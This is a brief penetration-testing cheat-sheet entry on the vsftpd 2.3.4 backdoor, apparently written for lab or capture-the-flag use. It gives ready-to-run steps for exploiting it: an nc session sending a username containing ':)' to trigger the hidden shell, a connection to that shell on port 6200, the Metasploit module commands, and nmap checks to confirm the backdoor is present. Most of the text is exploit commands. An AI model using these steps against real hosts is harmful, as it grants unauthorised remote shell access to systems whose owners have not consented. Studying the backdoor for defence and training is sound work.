vsftpd
What it is: "Very Secure FTP Daemon" — lightweight FTP server for Linux. Version 2.3.4 was infamously backdoored with a hardcoded shell triggered by a smiley face in the username.
Default ports: 21 (FTP), 6200 (backdoor shell)
Vuln research:
vsftpd 2.3.4 Backdoor
Smiley face backdoor — Triggered by username containing :)
nc $IP 21
USER backdoor:)
PASS anything
# Opens shell on port 6200
nc $IP 6200
Metasploit vsftpd backdoor
Automated exploitation — Fastest method
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS $IP
run
Check if backdoor is present
Not all 2.3.4 installations have the backdoor — Verify first
nmap -sV -p 21 $IP
# If version shows 2.3.4, try the backdoor
nmap -p 6200 $IP